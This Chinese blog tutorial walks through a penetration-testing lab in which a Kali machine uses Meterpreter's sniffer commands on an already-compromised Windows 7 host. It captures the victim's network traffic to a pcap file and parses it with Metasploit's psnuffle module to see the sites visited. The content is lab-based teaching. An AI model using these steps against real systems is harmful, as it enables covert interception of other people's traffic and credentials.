捕获内网数据包
  KRe60ogUm4le 12天前 23 0

环境:小攻:Kali 2020,ip:192.168.1.133

          小受:win7 x86,ip:192.168.1.137

一、生成木马及监听主机参考上篇文章:

内网渗透 -- 提升权限(利用提权漏洞)

二、捕获数据包

1、加载sniffer:load sniffer

2、查看网卡信息:sniffer_interfaces

捕获内网数据包

3、开启网卡监听,内容会自动保存到缓存中:sniffer_start 2

4、进入小受,然后随便访问几个网站

捕获内网数据包

捕获内网数据包

4、将捕获到数据保存下来,默认保存地址/root

sniffer_dump 2 aiyou.cap

捕获内网数据包

5、启动wireshark,打开保存下来的文件

捕获内网数据包

捕获内网数据包

三、通过解包模块解包

1、选择解包模块

use auxiliary/sniffer/psnuffle

2、查看需要设置的参数

show options

捕获内网数据包

3、设置解包文件路径

set pcapfile /root/2.cap

4、运行,run,可以查看到我们刚才访问的地址

捕获内网数据包

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 12天前 0

暂无评论

推荐阅读
KRe60ogUm4le